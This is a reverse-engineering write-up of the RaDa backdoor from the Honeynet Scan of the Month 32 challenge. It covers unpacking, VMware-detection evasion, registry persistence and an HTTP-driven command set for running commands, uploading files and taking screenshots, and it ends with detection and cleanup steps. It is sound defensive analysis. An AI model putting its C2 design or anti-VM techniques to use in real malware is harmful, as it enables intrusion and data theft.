Honeynet Scan of the Month 32 Analysis

Author: Chris Eagle, cseagle at nps d0t edu

Answers to the challenge questions can be found here

Analyzing RaDa.zip, for Scan of the Month 32

The Honeynet Scan of the Month Challenge for September 2004 invited participants to analyze a malware specimen distributed for the challenge as RaDa.zip (named after the program's authors Raul and David). The only information given in the challenge statement was:

"All we are going to tell you about the binary is that it was created to increase the security awareness around malware specimens and to point out the need of additional defensive countermeasures in order to fight current malware threats."

Background: My preferred method of approaching a malware analysis is to do some preliminary investigation of the binary using simple tools such as file and strings to develop an idea of what to expect and then move into a purely passive analysis phase. My malware analysis platform of choice is a Windows workstation within IdaPro and cygwin utilities installed.

Obtaining the binary: The file RaDa.zip was downloaded from the Honeynet site and its integrity verified using both the md5sum and sha1sum tools available with cygwin. The file utility verified that RaDa.zip was indeed a zip file:
$ file RaDa.zip
RaDa.zip: Zip archive data, at least v2.0 to extract
and the single file contained within, RaDa.exe was extracted. The file utility was used again to categorize RaDa.exe as:
$ file RaDa.exe
RaDa.exe: MS-DOS executable (EXE), OS/2 or MS Windows
Preliminary analysis: Following confirmation that the malware file was a Windows executable, the strings utility was used to see if it could uncover anything interesting. With any Windows binary, it is always a good idea to scan for both 7-bit ASCII and 16 bit Unicode strings. The following ASCII strings were found (edited to show only initially interesting strings):
$ strings -a RaDa.exe
!This program is the binary of SotM 32..
KERNEL32.DLL
MSVBVM60.DLL
LoadLibraryA
GetProcAddress
ExitProcess
And, the following Unicode strings (note the use of the "-e l" option to search for 16 bit character strings, "man strings" for more info) were found:
$ strings -e l RaDa.exe
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Malware
ProductName
RaDa
FileVersion
1.00
ProductVersion
1.00
InternalName
RaDa
OriginalFilename
RaDa
VarFileInfo
Translation
The most interesting fact learned from all of this is that the binary was probably written in Visual Basic based on its use of MSVBVM60.DLL (rather than MSVCRT0.DLL, the standard C library). MSVBVM60.DLL is described as: "msvbvm60.dll is a module for the Microsoft Visual Basic virtual machine" by ProcessLibrary.com. An additional thing to note here is that binaries that yield so few strings often turn out to be protected by some form of obfuscator such as ASPack, or UPX. This knowledge helps us know what to expect when we take a closer look.

A More Detailed Look: The next thing I always do with a malware specimen is load it up in IdaPro. I am generally interested in answering the following questions:
I am interested in these questions just in case I decide to actually run the program as part of testing it. Running the program is something I try to avoid entirely as an analysis technique. I generally only run malware sample once I know what to expect of them and when I can be sure that I can control them. In any case, if I do run them, they are always run on an isolated network.

When the file was loaded into IdaPro, Ida displayed a warning message (seen to the right) that the import table was located in a non-standard section and recommended reloading the binary in manual mode, which I did. Ida was able to disassemble only a single function "start" at the entry point of the program. The fact that Ida was able to recognize so little code was also an indication that the binary had been obfuscated in some way. Based on personal experience, I immediately recognized the protection algorithm as that employed by the Universal Packer for Executables (UPX). It was also clear that the binary had been further obfuscated to remove some of the telltale signs of UPX packing. Namely the section names had been altered to JDR (the first initials of the first names of the authors of this month's scan) from UPX and the characteristic UPX packing notice placed at the beginning of each UPX compressed file had been overwritten with the following string:
!This program is the binary of SotM 32..
As a consequence of these actions, the original, uncompressed binary could not be recovered using UPX itself. While UPX is capable of compressing a binary, it is also capable of decompressing a UPX compressed binary in order to recover the original, uncompressed binary. This is done with the "-d" command line option to UPX. Unfortunately, if UPX detects that a binary has been tampered with, it will refuse to decompress the binary. In order to work with UPX protected binaries within IdaPro I had previously developed an IDC script specifically to unpack UPX binaries. The script mimics the UPX decompression routine and reconstructs the programs import table in a manner similar to UPX itself. A useful thing to do following execution of the decompression script is to have Ida rescan the binary for strings. If the decompression was successful, a fair number of new strings should be detectable. Because Ida has grouped data in ways that it prefers, it is useful to have Ida "Ignore defined instructions and data" (see the figure to the right) when scanning for new strings. Also, since this is a Windows binary, it is useful to scan for Unicode strings in addition to standard C strings. Some results of the new strings scan appear in the figure below:

Tracing execution of the program following decompression is simply a matter of noting where the UPX decompression stub transfers control once it is finished. In this case we find the following instructions at the end of the decompression routine:
JDR1:0040FE77 loc_40FE77:                            ; CODE XREF: JDR1:0040FE30
JDR1:0040FE77 popa
JDR1:0040FE78 jmp near ptr dword_4018A4
So analysis continued at the instruction at location 0x04018A4 which unfortunately does not lead very far:
JDR0:0040189C j_Ordinal_0x64 proc near               ; CODE XREF: JDR0:004018A9
JDR0:0040189C jmp ds:Ordinal_0x64
JDR0:0040189C j_Ordinal_0x64 endp
JDR0:0040189C
JDR0:0040189C ; ---------------------------------------------------------------------------
JDR0:004018A2 align 4
JDR0:004018A4
JDR0:004018A4 loc_4018A4: ; CODE XREF: JDR1:0040FE78
JDR0:004018A4 push offset dword_401994
JDR0:004018A9 call j_Ordinal_0x64
Here we see that the program immediately pushes a value then calls an imported library function. The key to continued execution must lie in the data that is pushed then, so examination continued at location 0x0401994. As seen in the following figure, this location begins with a VB5 marker indication a Visual Basic 5 compatible data structure. Location 0x0401994 is clearly not executable, so perhaps this data structure contains a pointer to the main function of the malware program. Following a little data reorganization some values stand out for potential exploration. The values contained in locations 004019C0, 004019C4, 004019E0, and 004019E4 all fall within the range of the JDR0 section of the program and may therefore point to executable portions of the program. As seen in the figure below, IdaPro displays the contents of the target locations whenever the mouse cursor is held over an address. In the case of address 4045D0h, it is clear (with a little reverse engineering experience) that a function prologue is present at that address, while no function prologues appear to be present at the other 3 pointer locations. As a side note, it is a useful reverse engineering skill to remember what the machine language representation of a function prologue looks like in order to be able to recognize function boundaries while looking at raw hex.

Transferring attention to program location 4045D0h and asking Ida to change the displayed data into first code, then a function yields the results in the following figure. I elected to rename the function VB_Main and considered this the true entry point to the program. While Ida was able to recognize calls to library functions (because the import table had been reconstructed), it was not able to recognize calls to functions that had not been properly analyzed yet.

The following lines show a case in which Ida does not yet know a function exists at the target of a call instruction:
JDR0:00404879
JDR0:00404879 loc_404879: ; CODE XREF: VB_Main+2A1
JDR0:00404879 call near ptr dword_404F40+70h
By asking Ida to convert the values around location 404F40h into code, a new function is discovered and the call instruction is transformed into the following:
JDR0:00404879 loc_404879:                        ; CODE XREF: VB_Main+2A1
JDR0:00404879 call sub_404FB0
sub_404FB0 appears in the following figure and the string reference begins to give us the sense that we are on the right track:


By analyzing each newly discovered function for similar unresolved call instructions additional functions are located until the start of every function contained in the file has been found and properly reformatted into a disassembled function listing.  The final version of the IdaPro database file generated for this analysis can be found here (IDA 4.70 database format).

Behavioral Analysis: Once all of the functions within the program have been found, the behavior of each needs to be understood. The most interesting function initially if the once mentioned above, sub_404FB0. This function stands out because of its reference to many interesting strings including the following:
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
which is the name of a Windows registry key often used by malware to ensure that the malware is restarted each time a computer is rebooted. All programs listed under this key are started by Windows at system startup. Analysis of function sub_404FB0 shows that it largely performs initialization tasks for a number of string variables. For this reason I renamed the function Init_data. Another interesting string that gets referenced from this function is:
"HKLM\Software\VMware, Inc.\VMware Tools\InstallPath"
Which is a key used by VMWare to indicate the install location for "VMWare Tools" within virtual machines running Windows as the guest operating system. IdaPro's cross-referencing features indicate every location from which a program variable is referenced. By making use of cross-referencing, the functions that refer to the two registry keys mentioned above are quickly located for analysis.

In the case of the "Run" key, a function is found that performs a registry write to add RaDa.exe (or whatever it has been renamed to) to the list of programs run at system startup. In the case of the "VMWare Tools" key, a function is found in which the malware tests for the presence of this key. From this it is inferred that the malware is actively looking to see if it is running within a virtual machine. Further analysis of the same function reveals that the malware makes use of the Windows WMI interface to iterate through each network interface and test whether the MAC address of the interface is one which belongs to VMWare as assigned by the IEEE and published in its list of "Organizationally Unique Identifiers (OUI)/company Ids" (http://standards.ieee.org/regauth/oui/oui.txt). I dubbed this function "check_for_vmware".

Each function called by Init_data was examined in turn. One of the more revealing functions contained a large program loop that tested for a number of strings that each started with "--". This function was dubbed parseArgs as it appeared to be a command line argument parser. The following is a table of command line arguments accepted by the program and their purpose.

Argument
Description
--visible
Causes Internet Explorer window to be displayed during command fetch operations
--verbose
Does nothing other than initialize a string: "Starting DDoS Smurf remote attack..." there is no evidence that the binary actually performs a Smurf attack however.
--server <url base>
Specifies the base url of the remote command server which must be on a private subnet and must be refered to by IP rather than hostname. default: http://10.10.10.10/RaDa
--commands <file name>
Specifies the name of the remote command file to retrieve. default: RaDa_commands.html
--cgipath <path>
Specifies the name of the remote cgi directory. default: cgi-bin
--cgiget <name>
Specifies the name of the remote cgi script to invoke for downloading files to the infected victim. default: download.cgi
--cgiput <name>
Specifies the name of the remote cgi script to invoke for uploading files off of the infected victim. default: upload.cgi
--tmpdir <dir>
Specifies the name of the working directory to be used by the running program instance. default: C:\RaDa\tmp
--period <time>
Specifies the number of seconds the program waits between successive command cycles. default: 60
--cycles <num>
Specifies the number of command cycles the program should complete before exiting. default: 0 (0 == infinite)
--help
Causes the program to display a copyright notice in an Internet Explorer window.
--gui
Causes the program to display a gui control panel.
--installdir <dir>
Specifies the directory in which the program will install itself default: C:\RaDa\bin
--noinstall
Specifies that the program should not install itself permanently (do not copy exe or add registry key). default is to install
--uninstall
Specifies that the program should uninstall itself by deleting its exe and removing its registry key.
--authors
Causes the program to open a dialog box listing the authors of the program. The dialog box will only be displayed if the check_for_vmware function indicates that the program is not running in a virtual machine.

Any other command line arguments cause the program to display the --help message and quit.

Once program data has been initialized by the Init_data function, control return to VB_Main which immediately calls a function I named "command_loop". If uninstall was specified, command_loop removes the program and terminates. If noinstall was NOT specified, then command_loop installs the program. Control then passes to a loop that executes the number of times specified by the --cycle argument. Each pass through the loop invokes a call to a function I named "execute" and then causes the program to sleep in accordance with the --period argument.

The execute function lies at the heart of this program. Analysis of the execute function reveals what the program is actually capable of. The function begins with a series of tests to ensure that the remote command server lies on a private subnet. The function then invokes an Internet Explorer Application object to download the remote command file whose URL is specified by <server>/<commands>. If the --visible flag was set, then the command file will be displayed in an Internet Explorer window. Once the file has been retrieved, the function iterates through a list of form elements contained within the html document. The name of each form element is tested to see if it represents a valid command to the program. The program recognizes the following commands:

Command
Argument
Description
exe <cmd>
run the specified command using "%COMSPEC% /C <cmd>"
get <filename>
invoke <server>/<cgipath>/<cgiget> to download <filename> from <server> to the victim's <tmpdir>
put <filename>
invoke <server>/<cgipath>/<cgiput> to upload <filename> from the victim to <server>
screenshot <filename>
saves a bmp image of the victim's screen into the named file in <tmpdir>
sleep <duration>
causes the program to sleep for the specified time. This is in addition to the delay introduced by the --period option

Each of the commands above requires a single parameter that is taken from the value field of the form element used to specify the command. An example command file is shown below:
The commands above instruct the program to:
  1. dump a directory listing into a file named dir.txt
  2. upload dir.txt to <server>
  3. delete the directory listing file
  4. download a file named "update.exe" from <server>
  5. execute the newly downloaded file "update.exe"
  6. capture a screen shot of the victim computer
  7. upload the screen shot to <server>
  8. delete the screen shot from the victim computer
If the command file that resides on <server> is updated during the period between cycles, then the program can be made to execute a new command set in the following execution cycle.

Additional analysis of the program indicates that the file upload portion of the code was lifted from this example: http://www.motobit.com/tips/detpg_uploadvbsie.htm. This was discovered by conducting an internet search for the following piece of text found in the program:
"Copyright (C) 2001 Antonin Foller, PSTRUH Software"
The discovery of this script made reverse engineering several functions much easier.

Behavioral Observation: Sufficient static analysis was performed to develop a good idea of the expected behavior of the program. In order to confirm my findings, the program was allowed to run in an instrumented lab environment. A web server was configured to accept requests from the program and all of the command line options noted previously were exercised. Because of the VMWare checks performed by the program, I elected to run it on a laptop running Windows 2000 rather than within a virtual machine. It should be noted however that all of the VMWare checks performed by the program can be defeated with the following steps:
  1. Uninstall VMWare Tools if they are installed in your VM
  2. Change the MAC address of the virtual adapter in your guest operating system. Steps for how to do this were posted to the Honeypots mailing list here: http://www.securityfocus.com/archive/119/361359/2004-04-20/2004-04-26/2
With those changes made, the program will happily tell you who its authors are even when running within a virtual machine.

Programs used to instrument test runs of RaDa include the following:
The following test runs were performed with any graphical output displayed to the right of the command used to generate it::
RaDa --noinstall --help
RaDa --noinstall --gui
RaDa --noinstall --authors
RaDa --noinstall --server http://192.168.0.202
Ethereal was used to capture network traffic and several different HTTP connections were observed:
  1. Request for RaDa_commands.html - the commands in this file are then executed resulting in two additional HTTP requests
  2. Request ro download file "update.exe"
  3. Request to upload file "dir.txt"
RaDa --server http://192.168.0.202
The purpose of  the command above was to observe the installation process of the program. Regmon and Filemon were used to monitor registry and file system activity respectively and Regshot was used to perform a before and after snapshot comparison of the registry.  The amount of data gathered by Regmon and Filemon can be overwhelming.  Both utilities offer some filtering capability, but I find it easier to save the data from each program to text files that I can search easily.  Regshot is an excellent tool to assist in data reduction as it focuses strictly on changes to the registry.
  1. Relevant Regmon data showing the addition of a "Run" key value to launch RaDa on startup.  Useful things to key on are "CreateKey" and "SetValue" events.
  2. Relevant Filemon data showing first the creation of the install directories and second the copying of RaDa.exe from its original location to the specified install location. Useful things to key on are "CREATE" and "WRITE" events.
  3. A RegShot comparison detailing the changes made to the registry following execution of RaDa.  Note the first item under "Values added".
RaDa --uninstall
Similar instrumentation was performed during the uninstall process.  It was observed that while the program does delete itself from its installed location, and it does remove the registry value used to launch the program on system startup, it does not remove the directory hierarchy created to support the program.

Indications that RaDa may be present or running on a system:

The following items are indications that RaDa may be present on a system
  1. RaDa.exe observed in Task Manager
  2. Unexplained instances of IEXPLORE.exe observed in Task Manager
  3. The presence of the directory: C:\RaDa
  4. The presence of a registry value in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run that points to RaDa.exe
  5. Periodic uncommanded HTTP requests observed for file "RaDa_commands.html"
Cleaning RaDa from a system:
  1. Locate and delete the RaDa binary which by default will reside in C:\RaDa\bin.
  2. Using regedit, navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and delete the value that points to the RaDa binary.
  3. Kill the RaDa process using Task Manager. You may also need to kill an IEXPLORE process. Make sure all visible instances of Internet explorer are closed, then kill any IEXPLORE processes that remain listed in Task Manager.

References: